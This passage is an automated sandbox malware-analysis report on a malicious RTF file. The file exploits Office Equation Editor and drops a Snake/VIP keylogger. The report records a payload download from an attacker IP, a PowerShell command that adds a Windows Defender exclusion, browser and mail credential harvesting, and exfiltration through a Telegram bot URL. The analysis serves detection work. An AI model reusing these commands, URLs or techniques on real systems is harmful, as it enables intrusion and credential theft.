                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe TID: 4004Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe TID: 4048Thread sleep time: -15679732462653109s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe TID: 4048Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe TID: 4056Thread sleep count: 675 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe TID: 4056Thread sleep count: 9135 > 30Jump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3184Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  .NET source code references suspicious native API functions
                  Source: 5.2.cdlpohalgate39567.exe.4069d28.3.raw.unpack, COVID19.csReference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                  Source: 5.2.cdlpohalgate39567.exe.4069d28.3.raw.unpack, FFDecryptor.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                  Source: 5.2.cdlpohalgate39567.exe.4069d28.3.raw.unpack, FFDecryptor.csReference to suspicious API methods: hModuleList.Add(LoadLibrary(text21 + "\\mozglue.dll"))
                  Adds a directory exclusion to Windows Defender
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe"
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe"Jump to behavior
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeMemory written: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe "C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess created: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe "C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeQueries volume information: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeQueries volume information: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe VolumeInformationJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Snake Keylogger
                  Source: Yara matchFile source: 00000007.00000002.942629985.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 7.2.cdlpohalgate39567.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.cdlpohalgate39567.exe.4069d28.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.cdlpohalgate39567.exe.3fe5508.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.cdlpohalgate39567.exe.3f60ce8.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.cdlpohalgate39567.exe.4069d28.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000007.00000002.942222984.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.438924652.0000000003D39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: cdlpohalgate39567.exe PID: 3788, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: cdlpohalgate39567.exe PID: 3872, type: MEMORYSTR
                  Yara detected VIP Keylogger
                  Source: Yara matchFile source: 7.2.cdlpohalgate39567.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.cdlpohalgate39567.exe.4069d28.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.cdlpohalgate39567.exe.3fe5508.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.cdlpohalgate39567.exe.3f60ce8.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.cdlpohalgate39567.exe.4069d28.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000007.00000002.942222984.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.438924652.0000000003D39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: cdlpohalgate39567.exe PID: 3788, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: cdlpohalgate39567.exe PID: 3872, type: MEMORYSTR
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                  Source: Yara matchFile source: 7.2.cdlpohalgate39567.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.cdlpohalgate39567.exe.4069d28.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.cdlpohalgate39567.exe.3fe5508.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.cdlpohalgate39567.exe.3f60ce8.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.cdlpohalgate39567.exe.4069d28.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000007.00000002.942222984.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.438924652.0000000003D39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: cdlpohalgate39567.exe PID: 3788, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: cdlpohalgate39567.exe PID: 3872, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected Snake Keylogger
                  Source: Yara matchFile source: 00000007.00000002.942629985.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 7.2.cdlpohalgate39567.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.cdlpohalgate39567.exe.4069d28.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.cdlpohalgate39567.exe.3fe5508.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.cdlpohalgate39567.exe.3f60ce8.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.cdlpohalgate39567.exe.4069d28.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000007.00000002.942222984.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.438924652.0000000003D39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: cdlpohalgate39567.exe PID: 3788, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: cdlpohalgate39567.exe PID: 3872, type: MEMORYSTR
                  Yara detected VIP Keylogger
                  Source: Yara matchFile source: 7.2.cdlpohalgate39567.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.cdlpohalgate39567.exe.4069d28.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.cdlpohalgate39567.exe.3fe5508.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.cdlpohalgate39567.exe.3f60ce8.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.cdlpohalgate39567.exe.4069d28.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000007.00000002.942222984.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.438924652.0000000003D39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: cdlpohalgate39567.exe PID: 3788, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: cdlpohalgate39567.exe PID: 3872, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                  Native API                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		11
                  Disable or Modify Tools                  		1
                  OS Credential Dumping                  		1
                  File and Directory Discovery                  		Remote Services11
                  Archive Collected Data                  		1
                  Web Service                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts33
                  Exploitation for Client Execution                  		Boot or Logon Initialization Scripts111
                  Process Injection                  		1
                  Deobfuscate/Decode Files or Information                  		1
                  Input Capture                  		13
                  System Information Discovery                  		Remote Desktop Protocol1
                  Data from Local System                  		14
                  Ingress Tool Transfer                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  Command and Scripting Interpreter                  		Logon Script (Windows)Logon Script (Windows)3
                  Obfuscated Files or Information                  		Security Account Manager1
                  Security Software Discovery                  		SMB/Windows Admin Shares1
                  Screen Capture                  		11
                  Encrypted Channel                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                  Install Root Certificate                  		NTDS1
                  Query Registry                  		Distributed Component Object Model1
                  Email Collection                  		3
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                  Software Packing                  		LSA Secrets1
                  Process Discovery                  		SSH1
                  Input Capture                  		24
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  Timestomp                  		Cached Domain Credentials31
                  Virtualization/Sandbox Evasion                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  DLL Side-Loading                  		DCSync1
                  Application Window Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  Masquerading                  		Proc Filesystem1
                  Remote System Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                  Modify Registry                  		/etc/passwd and /etc/shadow1
                  System Network Configuration Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron31
                  Virtualization/Sandbox Evasion                  		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd111
                  Process Injection                  		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 1545183 Sample: na.doc Startdate: 30/10/2024 Architecture: WINDOWS Score: 100 41 Initial sample is an obfuscated RTF file 2->41 43 Suricata IDS alerts for network traffic 2->43 45 Found malware configuration 2->45 47 24 other signatures 2->47 8 WINWORD.EXE 291 22 2->8         started        process3 file4 27 C:\Users\user\Desktop\~$na.doc, data 8->27 dropped 11 EQNEDT32.EXE 11 8->11         started        16 EQNEDT32.EXE 8->16         started        process5 dnsIp6 39 87.120.84.38, 49164, 80 SHARCOM-ASBG Bulgaria 11->39 29 C:\Users\user\...\cdlpohalgate39567.exe, PE32 11->29 dropped 31 C:\Users\user\...\pgTQ4mfZBbJhpdd[1].exe, PE32 11->31 dropped 67 Office equation editor establishes network connection 11->67 69 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 11->69 18 cdlpohalgate39567.exe 3 11->18         started        file7 signatures8 process9 signatures10 49 Multi AV Scanner detection for dropped file 18->49 51 Machine Learning detection for dropped file 18->51 53 Adds a directory exclusion to Windows Defender 18->53 55 Injects a PE file into a foreign processes 18->55 21 cdlpohalgate39567.exe 12 2 18->21         started        25 powershell.exe 4 18->25         started        process11 dnsIp12 33 reallyfreegeoip.org 21->33 35 api.telegram.org 21->35 37 8 other IPs or domains 21->37 57 Installs new ROOT certificates 21->57 59 Tries to steal Mail credentials (via file / registry access) 21->59 61 Tries to harvest and steal browser information (history, passwords, etc) 21->61 signatures13 63 Tries to detect the country of the analysis system (by using the IP) 33->63 65 Uses the Telegram API (likely for C&C communication) 35->65

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  na.doc50%ReversingLabsDocument-RTF.Exploit.CVE-2017-11882
                  na.doc100%AviraHEUR/Rtf.Malformed

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\pgTQ4mfZBbJhpdd[1].exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\pgTQ4mfZBbJhpdd[1].exe71%ReversingLabsByteCode-MSIL.Trojan.SnakeKeyLogger
                  C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe71%ReversingLabsByteCode-MSIL.Trojan.SnakeKeyLogger

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                  https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                  http://ocsp.entrust.net030%URL Reputationsafe
                  http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                  http://checkip.dyndns.org/0%URL Reputationsafe
                  http://checkip.dyndns.org/q0%URL Reputationsafe
                  http://reallyfreegeoip.org0%URL Reputationsafe
                  http://checkip.dyndns.com0%URL Reputationsafe
                  http://ocsp.entrust.net0D0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                  https://reallyfreegeoip.org/xml/0%URL Reputationsafe
                  http://crl.entrust.net/server1.crl00%URL Reputationsafe
                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                  http://checkip.dyndns.org0%URL Reputationsafe
                  https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                  https://reallyfreegeoip.org0%URL Reputationsafe
                  https://secure.comodo.com/CPS00%URL Reputationsafe
                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                  http://crl.entrust.net/2048ca.crl00%URL Reputationsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  reallyfreegeoip.org
                  		188.114.97.3
                  		truetrue
                    		unknown
                    api.telegram.org
                    		149.154.167.220
                    		truetrue
                      		unknown
                      checkip.dyndns.com
                      		132.226.8.169
                      		truefalse
                        		unknown
                        checkip.dyndns.org
                        		unknown
                        		unknowntrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://reallyfreegeoip.org/xml/173.254.250.78false
                            		unknown
                            http://checkip.dyndns.org/false
                            • URL Reputation: safe
                            		unknown
                            https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:610930%0D%0ADate%20and%20Time:%2010/30/2024%20/%208:13:13%20PM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20610930%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                              		unknown
                              http://87.120.84.38/txt/pgTQ4mfZBbJhpdd.exetrue
                                		unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                https://duckduckgo.com/chrome_newtabcdlpohalgate39567.exe, 00000007.00000002.942629985.0000000002768000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.943337950.000000000355B000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.00000000027BC000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.000000000277B000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.00000000027A9000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.943337950.00000000035A7000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://duckduckgo.com/ac/?q=cdlpohalgate39567.exe, 00000007.00000002.942629985.0000000002768000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.943337950.000000000355B000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.00000000027BC000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.000000000277B000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.00000000027A9000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.943337950.00000000035A7000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dwmf%2B5.1%26oq%3Dwmfcdlpohalgate39567.exe, 00000007.00000002.943337950.00000000036F6000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.943337950.0000000003657000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://api.telegram.orgcdlpohalgate39567.exe, 00000007.00000002.942629985.000000000269B000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://api.telegram.org/botcdlpohalgate39567.exe, 00000005.00000002.438924652.0000000003D39000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.000000000269B000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942222984.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://ocsp.entrust.net03cdlpohalgate39567.exe, 00000007.00000002.942265984.0000000000526000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://tempuri.org/DataSet1.xsdcdlpohalgate39567.exe, 00000005.00000000.428364525.0000000001012000.00000020.00000001.01000000.00000004.sdmp, cdlpohalgate39567.exe.2.dr, pgTQ4mfZBbJhpdd[1].exe.2.drfalse
                                        		unknown
                                        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0cdlpohalgate39567.exe, 00000007.00000002.942265984.0000000000526000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          http://www.diginotar.nl/cps/pkioverheid0cdlpohalgate39567.exe, 00000007.00000002.942265984.0000000000526000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://varders.kozow.com:8081cdlpohalgate39567.exe, 00000005.00000002.438924652.0000000003D39000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942222984.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:610930%0D%0ADate%20acdlpohalgate39567.exe, 00000007.00000002.942629985.000000000269B000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		unknown
                                              http://87.120.84.38/txt/pgTQ4mfZBbJhpdd.exettC:EQNEDT32.EXE, 00000002.00000002.428467332.000000000067F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://www.google.com/search?q=wmfcdlpohalgate39567.exe, 00000007.00000002.943337950.0000000003657000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  http://checkip.dyndns.org/qcdlpohalgate39567.exe, 00000005.00000002.438924652.0000000003D39000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942222984.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://reallyfreegeoip.orgcdlpohalgate39567.exe, 00000007.00000002.942629985.000000000268D000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.000000000259F000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.000000000262A000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.0000000002636000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.0000000002644000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.000000000267F000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.000000000266D000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.0000000002619000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://87.120.84.38/txt/pgTQ4mfZBbJhpdd.exejEQNEDT32.EXE, 00000002.00000002.428467332.000000000067F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    http://checkip.dyndns.comcdlpohalgate39567.exe, 00000007.00000002.942629985.000000000268D000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.0000000002586000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.000000000262A000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.0000000002636000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.0000000002644000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.000000000267F000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.000000000266D000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.0000000002619000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://ocsp.entrust.net0Dcdlpohalgate39567.exe, 00000007.00000002.942265984.0000000000526000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namecdlpohalgate39567.exe, 00000005.00000002.438271817.0000000002749000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.00000000024E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://reallyfreegeoip.org/xml/cdlpohalgate39567.exe, 00000005.00000002.438924652.0000000003D39000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.0000000002586000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942222984.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://crl.entrust.net/server1.crl0cdlpohalgate39567.exe, 00000007.00000002.942265984.0000000000526000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
